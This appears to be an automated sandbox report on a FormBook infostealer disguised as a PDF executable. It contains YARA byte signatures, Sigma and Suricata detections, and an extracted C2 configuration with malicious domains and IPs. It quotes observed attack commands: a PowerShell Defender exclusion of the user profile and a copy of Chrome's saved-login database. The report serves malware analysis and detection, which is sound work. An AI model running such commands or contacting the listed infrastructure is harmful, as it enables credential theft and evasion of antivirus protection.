5.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
5.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
6.2.wmplayer.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.wmplayer.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.wmplayer.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.wmplayer.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.wmplayer.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
6.2.wmplayer.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.wmplayer.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.wmplayer.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.wmplayer.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.wmplayer.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x37a719:$a1: 3C 30 50 4F 53 54 74 09 40 0x3d6fa9:$a1: 3C 30 50 4F 53 54 74 09 40 0x519f79:$a1: 3C 30 50 4F 53 54 74 09 40 0x391068:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3ed8f8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x5308c8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x37ee97:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3db727:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x51e6f7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x389d7f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x3e660f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x5295df:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x37ddd0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37e04a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3da660:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3da8da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x51d630:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x51d8aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x389b7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3e640d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5293dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x389669:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3e5ef9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x528ec9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x389c7f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3e650f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5294df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x389df7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3e6687:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x529657:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x37ea62:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3db2f2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x51e2c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x38cce1:$sqlite3step: 68 34 1C 7B E1 0x38cdf4:$sqlite3step: 68 34 1C 7B E1 0x3e9571:$sqlite3step: 68 34 1C 7B E1 0x3e9684:$sqlite3step: 68 34 1C 7B E1 0x52c541:$sqlite3step: 68 34 1C 7B E1 0x52c654:$sqlite3step: 68 34 1C 7B E1 0x38cd10:$sqlite3text: 68 38 2A 90 C5 0x38ce35:$sqlite3text: 68 38 2A 90 C5 0x3e95a0:$sqlite3text: 68 38 2A 90 C5 0x3e96c5:$sqlite3text: 68 38 2A 90 C5 0x52c570:$sqlite3text: 68 38 2A 90 C5 0x52c695:$sqlite3text: 68 38 2A 90 C5 0x38cd23:$sqlite3blob: 68 53 D8 7F 8C 0x38ce4b:$sqlite3blob: 68 53 D8 7F 8C 0x3e95b3:$sqlite3blob: 68 53 D8 7F 8C 0x3e96db:$sqlite3blob: 68 53 D8 7F 8C 0x52c583:$sqlite3blob: 68 53 D8 7F 8C 0x52c6ab:$sqlite3blob: 68 53 D8 7F 8C
0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5143b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x570c41:$a1: 3C 30 50 4F 53 54 74 09 40 0x6b3c11:$a1: 3C 30 50 4F 53 54 74 09 40 0x52ad00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x587590:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6ca560:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x518b2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x5753bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x6b838f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x523a17:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x5802a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x6c3277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x517a68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x517ce2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5742f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x574572:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6b72c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6b7542:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x523815:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5800a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6c3075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x523301:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x57fb91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6c2b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x523917:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5801a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6c3177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x523a8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x58031f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6c32ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5186fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x574f8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6b7f5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x526979:$sqlite3step: 68 34 1C 7B E1 0x526a8c:$sqlite3step: 68 34 1C 7B E1 0x583209:$sqlite3step: 68 34 1C 7B E1 0x58331c:$sqlite3step: 68 34 1C 7B E1 0x6c61d9:$sqlite3step: 68 34 1C 7B E1 0x6c62ec:$sqlite3step: 68 34 1C 7B E1 0x5269a8:$sqlite3text: 68 38 2A 90 C5 0x526acd:$sqlite3text: 68 38 2A 90 C5 0x583238:$sqlite3text: 68 38 2A 90 C5 0x58335d:$sqlite3text: 68 38 2A 90 C5 0x6c6208:$sqlite3text: 68 38 2A 90 C5 0x6c632d:$sqlite3text: 68 38 2A 90 C5 0x5269bb:$sqlite3blob: 68 53 D8 7F 8C 0x526ae3:$sqlite3blob: 68 53 D8 7F 8C 0x58324b:$sqlite3blob: 68 53 D8 7F 8C 0x583373:$sqlite3blob: 68 53 D8 7F 8C 0x6c621b:$sqlite3blob: 68 53 D8 7F 8C 0x6c6343:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7812, ProcessName: powershell.exe

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 8156, ProcessName: rundll32.exe

Sigma detected: Potential Browser Data Stealing

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8156, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 1352, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7924, ProcessName: svchost.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8156, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 1352, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7812, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7924, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Steal Google chrome login data

Source: Process started

Author: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8156, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 1352, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-22T17:27:13.393340+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49713	23.227.38.74	80	TCP
2024-09-22T17:29:39.690092+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.7	49716	78.46.88.140	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-22T17:27:13.456161+0200	2829004	1	Malware Command and Control Activity Detected	192.168.2.7	49714	23.227.38.74	80	TCP
2024-09-22T17:28:14.376902+0200	2829004	1	Malware Command and Control Activity Detected	192.168.2.7	49715	203.161.60.191	80	TCP
2024-09-22T17:29:41.658867+0200	2829004	1	Malware Command and Control Activity Detected	192.168.2.7	49717	78.46.88.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.taxuw.com/n7ak/www.jam-nins.com	Avira URL Cloud: Label: malware
Source: http://www.supremeajock.biz/n7ak/www.1690.biz	Avira URL Cloud: Label: malware
Source: http://www.maximsboutique.com/n7ak/www.tuktukwines.com	Avira URL Cloud: Label: malware
Source: http://www.supremeajock.biz/n7ak/	Avira URL Cloud: Label: malware
Source: http://www.maximsboutique.com	Avira URL Cloud: Label: malware
Source: http://www.maximsboutique.com/n7ak/	Avira URL Cloud: Label: malware
Source: http://www.taxuw.com/n7ak/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.playdoapp.online/n7ak/"], "decoy": ["wise-transfer.info", "jam-nins.com", "thebestsocialcrm.com", "majomeow222.com", "ancientshadowguilt.space", "gentleman-china.com", "parquemermoz.store", "taxuw.com", "sharqiyapaints.com", "libraryofkath.com", "1949wan.com", "synqr.net", "bitchessgirls.com", "btonu.cfd", "coding-bootcamps-16314.com", "leadership22-tdh.site", "maximsboutique.com", "irishsummertruffles.com", "sdnaqianchuan.com", "uyews.xyz", "mostvisitors.com", "prembug.com", "lebondtrip.com", "villavouno.com", "solanosotostudio.com", "pbx1.website", "littleeturtle.com", "supremeajock.biz", "turborings.run", "parkpeninsula.online", "goodstuff.tv", "17qld.com", "thehandycrewcompany.com", "alwaystuesdaytacos.com", "entribeworks.com", "susanboyleinfo.com", "volkovastyu.com", "tradingmoja.com", "germancompany-eg.com", "gameofgem.com", "hbdpcq.com", "budsdesigns.com", "sistemrizal.xyz", "395boulderbrookdr.com", "forounlock.com", "cp2967.com", "creatividadymedia.com", "marocquadchallenge.com", "tuktukwines.com", "tripskorea.com", "eyvonnesewingshop.com", "1690.biz", "perfectkick.website", "jreengineering.tech", "lilmeow.store", "ttjsdispatchingllc.com", "carltonellis.com", "redantholdings.com", "luxuryworkingfarms.com", "appsecintelligence.com", "studmate.online", "imogenbot.store", "netheerlandart.com", "bikelegalkentucky.com"]}

Multi AV Scanner detection for domain / URL

Source: www.jam-nins.com	Virustotal: Detection: 11%	Perma Link
Source: volkovastyu.com	Virustotal: Detection: 5%	Perma Link
Source: www.supremeajock.biz	Virustotal: Detection: 5%	Perma Link
Source: www.1690.biz	Virustotal: Detection: 6%	Perma Link
Source: www.maximsboutique.com	Virustotal: Detection: 7%	Perma Link
Source: www.parkpeninsula.online	Virustotal: Detection: 7%	Perma Link
Source: www.playdoapp.online	Virustotal: Detection: 10%	Perma Link
Source: http://www.tuktukwines.com/n7ak/www.playdoapp.online	Virustotal: Detection: 5%	Perma Link
Source: http://www.gameofgem.com/n7ak/	Virustotal: Detection: 5%	Perma Link
Source: http://www.playdoapp.online/n7ak/	Virustotal: Detection: 8%	Perma Link
Source: http://www.thehandycrewcompany.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com	Virustotal: Detection: 14%	Perma Link
Source: http://www.1690.biz	Virustotal: Detection: 6%	Perma Link
Source: http://www.parkpeninsula.online	Virustotal: Detection: 7%	Perma Link
Source: http://www.jam-nins.com	Virustotal: Detection: 11%	Perma Link
Source: http://www.playdoapp.online	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Specification and Quantity Pdf.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: Specification and Quantity Pdf.exe	Virustotal: Detection: 68%			Perma Link
Source: Specification and Quantity Pdf.exe	ReversingLabs: Detection: 65%

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
